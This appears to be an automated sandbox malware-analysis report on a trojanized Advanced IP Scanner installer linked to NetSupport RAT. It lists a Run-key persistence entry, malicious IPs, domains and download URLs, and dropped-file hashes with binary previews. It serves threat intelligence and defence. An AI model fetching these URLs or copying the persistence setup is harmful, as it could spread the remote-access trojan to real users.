Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: Advanced_IP_Scanner_2.5.4594.12.exe

Simulations

Behavior and APIs

Time	Type	Description
13:48:34	API Interceptor	20x Sleep call for process: powershell.exe modified
13:49:08	API Interceptor	14593242x Sleep call for process: client32.exe modified
17:48:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\SysHelper\client32.exe
17:48:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyApp C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.1.231	file.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	NeftPaymentError_Emdtd22102024_jpg.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	NeftPaymentError_Emdtd22102024_jpg.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Update.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	update.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	upd_8707558.msix	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Update.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	FakturaPDF.exe	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
	Update 124.0.6367.158.js	Get hash	malicious	NetSupport RAT	Browse	geo.netsupportsoftware.com/location/loca.asp
151.236.16.15	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://151.236.16.15/fakeurl.htm
199.188.200.195	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	http://199.188.200.195/fakeurl.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
payiki.com	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
geo.netsupportsoftware.com	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	https://webdemo.biz/	Get hash	malicious	NetSupport RAT, CAPTCHA Scam	Browse	104.26.0.231
	https://inspyrehomedesign.com	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	https://inspyrehomedesign.com/Ray-verify.html	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.68.212
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	http://holidaybunch.com	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	NeftPaymentError_Emdtd22102024_jpg.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
anyhowdo.com	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	199.188.200.195
	https://saniest.com/PO/PO%20-%20OCT.'24673937.rar	Get hash	malicious	Unknown	Browse	162.0.232.202
	#U2749Factura_#U2749_#U2462#U2465#U2460#U2463#U2463#U2460#U2462#U2461.hta	Get hash	malicious	Unknown	Browse	68.65.122.45
	#U2749Factura_#U2749_#U2466#U2461#U2466#U2462#U2467#U2465#U2465#U2465.hta	Get hash	malicious	Unknown	Browse	68.65.122.45
	672365339196e.vbs	Get hash	malicious	Unknown	Browse	68.65.122.45
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	162.0.231.203
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	162.0.231.203
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	63.250.47.57
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	162.0.238.246
	http://demettei.com	Get hash	malicious	Unknown	Browse	198.54.117.242
HVC-ASUS	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	151.236.16.15
	PO-33463334788.exe	Get hash	malicious	Remcos, GuLoader	Browse	23.227.202.197
	IGNM2810202400017701_270620240801_546001.vbs	Get hash	malicious	GuLoader	Browse	66.206.22.19
	https://www-suasconsult-com-br.translate.goog/?_x_tr_sl=pt&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc	Get hash	malicious	Unknown	Browse	69.46.1.10
	nklarm7.elf	Get hash	malicious	Unknown	Browse	23.227.187.69
	splmips.elf	Get hash	malicious	Unknown	Browse	172.110.9.223
	jklppc.elf	Get hash	malicious	Unknown	Browse	149.255.39.213
	kkkmips.elf	Get hash	malicious	Unknown	Browse	104.156.53.55
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	66.96.86.101
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	199.59.145.107
CLOUDFLARENETUS	z17Mz7zumpwTUMRxyS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.33.140
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.140
	https://s3.timeweb.cloud/d2247a8d-ceb09c71-57ee-4411-a590-e4de8ca5cf86/Contract/contract.htm#andrew.wise@arrowbank.com	Get hash	malicious	HTMLPhisher	Browse	104.17.201.1
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse	172.67.68.212
	https://0nmdby.data--8.co.uk/oGRApYgs	Get hash	malicious	Unknown	Browse	172.67.212.158
	https://flaviarc.com/sphp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/index.php	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	Lana_Rhoades_Photoos.js	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://usps.com-trackrsm.top/l	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exe	Get hash	malicious	Unknown	Browse
	Advanced Scanner.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	ip_scan_en_us_Release_2.5.4594.1.msi	Get hash	malicious	CobaltStrike	Browse
	ipscan.msi	Get hash	malicious	Darkgate	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	IPAVSCAN_win_version_1.1.3.msi	Get hash	malicious	Unknown	Browse
	Advanced_IP_Scanner_2.5.4594.1_net.exe	Get hash	malicious	Unknown	Browse
	Advanced_IP_Scanner_2.5.4594.1_net.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exe	Get hash	malicious	Unknown	Browse
	Advanced Scanner.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	ip_scan_en_us_Release_2.5.4594.1.msi	Get hash	malicious	CobaltStrike	Browse
	ipscan.msi	Get hash	malicious	Darkgate	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	IPAVSCAN_win_version_1.1.3.msi	Get hash	malicious	Unknown	Browse
	Advanced_IP_Scanner_2.5.4594.1_net.exe	Get hash	malicious	Unknown	Browse
	Advanced_IP_Scanner_2.5.4594.1_net.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Advanced IP Scanner\Advanced_IP_Scanner.ico (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	MS Windows icon resource - 9 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:	dropped
Size (bytes):	25214
Entropy (8bit):	5.181706176676903
Encrypted:	false
SSDEEP:	192:gZwwfjXDaFoDU90fQNBYNK30CCl77nQ6jtCuZEaaX/bv+NZmQDtLQIRLdc8ZDeO4:qLXDTQCQNmNa0CCl77nQ6viv6t2tMA
MD5:	3511FCBA762713FBC4D83979F300A383
SHA1:	61C33483A70C253FF38222021AD05E599F11E05C
SHA-256:	AD6B11E0F7B0E9DDD0B3440AA0C9308F18E385C7EBB78452A964F77A104B789E
SHA-512:	2CA49AE53A97FDD8AA857DFFFF281501506BAC8BD6B0D76B94CDA65592492A7DAA29FEC2CFD912DDBDCDEDEFF104BD21B00B2DED958C8BA7567536AFABE4D639
Malicious:	false
Reputation:	low
Preview:	..............(...............h....... ..........&... ..............00......h.......00.................... .h....'.. .... ......,..00.... ..%...<..(....... ...............................................................................................0...33..;...;.....ffo..6...3...o...`...o...`...o...`...o...`...o...o.......ww...ffn......n.......n.......fffg.................................................................................(....... ...........@.......................B...!{..cs..{{{.sss.{sk..s...Z...c..{ss.1...9......................9...s....R..............)...!{...1..{....9.................B....B................{..!........J.........{)...s..........k...........{c..B.................!..)...B...9.....................{...c...R...!......1...1.......................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5987880
Entropy (8bit):	6.645849589307296
Encrypted:	false
SSDEEP:	98304:I9HgaLmICbZhV8cBfAVG4F40zkpEJsv6tWKFdu9CcDo+fN4A:I9Hgaq5b7OcBfAVG4FiEJsv6tWKFdu9V
MD5:	C2BB94B2C229ECE69D865B1898C71324
SHA1:	AFAC1A2FEDE68AD129BB48B01ED8B80997F75D2F
SHA-256:	193814D47E0B7917C3373011F64CD3AC649A16D1D0515C9D409FA1794C5BFFB1
SHA-512:	2CB31EB8FD866510268553B77D2BB4DDFFB4D48F22C35B8679933CB48AC7B90DE1AEFCF6132DBCEF007F6F622869C931BE13A5D41234E49E0C7DB3F8C5CF8B0A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: Advanced Scanner.exe, Detection: malicious, Browse Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious, Browse Filename: ipscan.msi, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............s...s...s......s.\S....s..w...s..p...s..v...s..r...s..w...s..u...s..r...s...r...s...w...s...v...s...s...s.......s.......s...q...s.Rich..s.................PE..L.....%^...........!......7...$.....\|m5.......7....g..........................[.......[...@..........................eS.....\|zY.\|....0Z..............B[.(....@Z.8.....P.T.....................P.......P.@.............7..............................text.....7.......7................. ..`.rdata..4.!...7...!...7.............@..@.data...L.....Y..2....Y.............@....rsrc........0Z.......Y.............@..@.reloc..8....@Z.......Y.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6708264
Entropy (8bit):	6.661851136227646
Encrypted:	false
SSDEEP:	98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
MD5:	1FBE59E9BE0F445BB14BE02C0EE69D6F
SHA1:	98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
SHA-256:	F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
SHA-512:	00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: Advanced Scanner.exe, Detection: malicious, Browse Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious, Browse Filename: ipscan.msi, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../\|..B}.\|/\|..B}..*\|..B}..B\|.#G}.\|/y..B}.\|/x..C}.\|/}..B}.\|/...B}..B.B}.\|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1151016
Entropy (8bit):	6.482547207070433
Encrypted:	false
SSDEEP:	24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
MD5:	ED04DAB88E70661E4980A284B0DF6A0C
SHA1:	C1499360A68FDC12013A6CBB35C05A3098E95F41
SHA-256:	9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
SHA-512:	E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327208
Entropy (8bit):	6.804582730583226
Encrypted:	false
SSDEEP:	6144:zqg47yYJkKxQ8WVauJIg9FzQGRPvhUhcD3I95HIbPSRyuoboXHcJ2ZWa3Imr1y6a:LgTxQ3UuJIg9FzQGRPvlf
MD5:	72B2E7A9AF236E5CA0C27107E8C5690C
SHA1:	6AC273911118C7CAA71818C55E22D27B4C36B843
SHA-256:	725DD45CF413D669D22FD38BAFFB5296BD2FEC4C0379A1FA3ABA4CC12C41768A
SHA-512:	C4D217EB21501E1A26AFA5A6CB5B53152F6330A96A58B83709BE2C615594E1D640DD65E5353AD8CD2E7E3B4EABBB8E3AFF0F5D13D5577A1CCC05B590CC9803B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8.*8...8..9...8..9...8..9...8..9...8...9...8...9...8...8..8...9...8...9...8..F8...8...8...8...9...8Rich...8................PE..L...t.%^...........!.....z...j......T.....................................................@..........................}...k..............................(........7...a..T....................b.......a..@............................................text....x.......z.................. ..`.rdata...............~..............@..@.data...............................@....rsrc...............................@..@.reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5735464
Entropy (8bit):	6.639119541918398
Encrypted:	false
SSDEEP:	49152:hQQeqQ4ZHCscH74ar0+qrlOjvuzu7mA4a59KEyhRO6LyUfqcVeaXafSKHZV+gZtK:hzeqxHCTf4+qwGLW9sRO6XW+I9ipjN
MD5:	41C0478595550900E33B52B8CDBEDEAA
SHA1:	0550C6434EF71260D3581CE2A90F080DE93E01D6
SHA-256:	44E495DE09B59E66FDF0C1C65A2070A4CE95BAAF4169C875DEA0590BD37342BD
SHA-512:	9302EDB0DE46E0F132271532140F19D1C3B9DCE0D1F11046148E6DC81C689A07256928839FF0D64708A718004E1F216BE0F64C5C9B05CC1C612B6E0E71CC442D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q...}...}...}.......}.......}.......}.......}.......}.......}..N....}...}..cp......}.......}....y..}...}...}.......}..Rich.}..........................PE..L.....%^...........!.....H>..J.......J>......`>....e..........................W.....h.X...@..........................ZI.D...T.Q......0T..............hW.(....@T.....prH.T...................lsH......rH.@............`>.l5...........................text....F>......H>................. ..`.rdata...2...`>..4...L>.............@..@.data........S..Z....S.............@....rsrc........0T.......S.............@..@.reloc.......@T.......S.............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498216
Entropy (8bit):	6.392626000362742
Encrypted:	false
SSDEEP:	6144:lOssvQ+soy9eQdVgSTZuyvDTSVHyZ1Hy6:lsYvo4eQdKzW
MD5:	C80BA989BA52F73AD4332EA7B3BE0499
SHA1:	F4A2A70F2E23DB44AEC358F3DD282E68483AC631
SHA-256:	C86C36B20B602D6A063575136ECB417EB0A7AD8DDDBB966750FA348FEB74D309
SHA-512:	255862D9678F5380581F9C728327C3EA83D724A163ED35FA18BE22C35415E0E2819B8A4D2EACC0D94E53C5C3AB3D62AA2E978EF7C4F281C173C1C0A050A8EB5C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.!...O...O...O.......O...N...O...J...O...K...O...L...O.X.K...O.X.N...O...N...O...N...O...J...O...O...O......O.......O...M...O.Rich..O.........PE..L.....&^...........!.....Z...`.......\.......p............................................@..........................{...8..\........0...............~..(....@..,....p..T....................q.......p..@............p...............................text...,X.......Z.................. ..`.rdata...j...p...l...^..............@..@.data....B..........................@....rsrc........0......................@..@.reloc..,....@......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	228904
Entropy (8bit):	6.499413249756033
Encrypted:	false
SSDEEP:	3072:5vv6tCZo5oOM7fpXiUpuF007hkeWPp4bjUAIt1zG0jvbkEV3:56tb5NM7fpXiUkFdNqB4Gt1zG0h3
MD5:	0B4816D5308825B9C24FAA83CE4CB1F0
SHA1:	0EEFEF3564356B50D5B360DC4B8D8D316C99B210
SHA-256:	F10815CB6F99FA795B69FB547BA4376A336F46BC1FA279B486A24AD96FD74525
SHA-512:	806B6B203D73D08E127365C87A9AF98811E1C93568F66DFBFAE41EE13C97AC3FE623D42BC1A1FFFE36669B14E0F4E39499EC177ECA39B7339F57E50C97B20B2B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.,._.,._.,.'],._.,.2.-._.,.7.-._.,.2.-._.,.2.-._.,.2.-._.,Q2.-._.,._.,\_.,Q2.-._.,Q2.-._.,Q21,._.,._Y,._.,Q2.-._.,Rich._.,................PE..L.....%^...........!..............................a................................?\....@.............................T\..4)..x....`...............b..(....p..."..0...T...............................@............................................text............................... ..`.rdata..............................@..@.data........P.......2..............@....rsrc........`.......8..............@..@.reloc..."...p...$...>..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1681960
Entropy (8bit):	6.535592110075899
Encrypted:	false
SSDEEP:	49152:N7MNjXLsvFfAhpjccQ1hhTlPrLFhNG2y+L+aJwDcN:0jXL2mboRRhrL42yE
MD5:	B3411927CC7CD05E02BA64B2A789BBDE
SHA1:	B26CFDE4CA74D5D5377889BBA5B60B5FC72DDA75
SHA-256:	4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5
SHA-512:	732C750FA31D31BF4C5143938096FEB37DF5E18751398BABD05C01D0B4E5350238B0DE02D0CDFD5BA6D1B942CB305BE091AAC9FE0AAD9FC7BA7E54A4DBC708FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........lj..............u........j......x.......x.......d.......f.......x.......x.......f.......c.......c.......f..............'x......'x..`...'x..............'x......Rich............................PE..L....gb..........".................U.............@..........................P............@..................................3.......... p..............(....p..0....R..T....................S.......R..@...............d*...........................text.............................. ..`.rdata..b...........................@..@.data........0...4..................@....rsrc... p.......r...H..............@..@.reloc..0....p......................@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ar_sa.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26334
Entropy (8bit):	5.237840743757654
Encrypted:	false
SSDEEP:	384:sIX3LNpZy4imY2tBA01s0iMJ/vZYM2jeFxikFq2pkMPcK8LM+OEM4q78nkL9BHDS:TX3xpZy4BaMJ/vZJ2jeFxieN8LMkpk6
MD5:	6AB50593778FB5BD5D5422BDD90595E6
SHA1:	282946268660F41A7484BF19C30B7B958F6A82D4
SHA-256:	132676D1F5044AE5249B764B0CD4B67993932D121FBDDC13DB2AE75961562F0F
SHA-512:	359B8EE830E74575BDB7519F98180DD3440BBBE03DE9247F2FCF6A3EFD721DD1F56DB96DBF0D47E847EA6B6365BD5AD97DF6D5B277F5926622918FF05578DB37
Malicious:	false
Preview:	<.d....!..`...B..........R....;...J...;...c...;.......;.......;..>....O..U....[..Q....^..+....^..M...(5...y..G.......H,..J...K...:...N:......V...?..._...V.......%.......K....y..Ki......................R....t..'....t..K....t..UK.....<....j......5t......@...=...H5..S...f...+.......@........;...........~...l...`..2....e..T.......T.......... =...A...y......y......%..!...0..!..+.....+.+.......+....Z.+....$.+....#..G.......G....'].H0...U%.Hw9.....Hw9.....I....%^.J6......J6......J6......J6...D).LD....d.L.b..Ur.M.S..<j.R.....0.V....+..Wi...Tr.W.T...m.Z.\|..L..[f3..P..gc......w0K..B...H...".......VF...T...a..."..0L...~..2p.. d..@....T..*W..2...........S.......Y..9.E..;Z.L.#..\..M$o.....e.....".l8...2....^..D^..I....>......=.......MY......S...>......>...:..3..+e..l...E.......5..5.l..X..AV...%'.y....Q....0..N.......M.......SA..tb..1.......................Nk......8.......I..(....M..1V...&(.R....-..W.<..Y}.f.~...f....../...1........^..1k...5..............c..A@.;6...[..q.J..JL..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_bg_bg.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28561
Entropy (8bit):	5.2596092915719215
Encrypted:	false
SSDEEP:	768:O4suMMyQmmoRKIKfAoMzI4VxECTwTPJBLCsDbn:tsuMMypm/M04MCYTL/n
MD5:	1D2AAC0633801D7DEF387CF78A968BFF
SHA1:	D4721BBF3AA690683DCD75B690080A9785BF81B5
SHA-256:	8FDF83BEB8D7E9D3CD0B77DDC636A77A1E4FF591ED10851229ED49BDC78644DF
SHA-512:	956759A441647A00FCEA9AA4BE7DBA4463DDC6DA2EBBBFDF697BAED99CEF55B924D72F92E3443251C5C64927FF37DE345F95C366920ADFE829823105C3EB0673
Malicious:	false
Preview:	<.d....!..`...B..........[H...;...D...;.......;.......;..!....;..Ef...O..^,...[..Y....^..0....^..U...(5...m..G.......H,..R...K...A...N:......V...F..._..._`......).......R....y..S........7..............[ ...t..+O...t..S....t..]......B....j......5t...y..@...D}..H5..[...f...1!......Gn.......a...........~..4....`..9....e..]E......]k......... =...H...y...f..y...u..%..%F..0..%o.+.......+.......+......+......+....'..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)@.J6......J6......J6......J6...K#.LD......L.b..^..M.S..C..R.......V....1O.Wi...\..W.T.....Z.\|..Tm.[f3..Xd.gc......w0K..I...H...&-......^....T......."..6....~..8... d..G....T../W..2...........\L......b..9.E..B..L.#..e_.M$o...\.e.......l8...83...^..K`..I....J......D.......U_......\...>......>...z..3..0...l...L.......;..5.l..a..AV...(..y....ZW...0..V8......U.......[...tb..7.......................V.......?4......Q..(....U..1V...*&.R....2..W.<..b..f.~..".......5...1....g...^..7....5...[..........c..H@.;6...c..q.J..Q...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	389160
Entropy (8bit):	6.42467668414915
Encrypted:	false
SSDEEP:	6144:KsFG7TN7RchK49w1j0GqH8HQQG16lNWjL2D7hn1WMrNayAAXe0jvYE:LgTN7RWK+PH2llNWGXRay7e0b1
MD5:	12BF5F988FF62C112FAC061D9EC97C47
SHA1:	C4E01DE097C1564872F889C5BBBD8D0559EDAE73
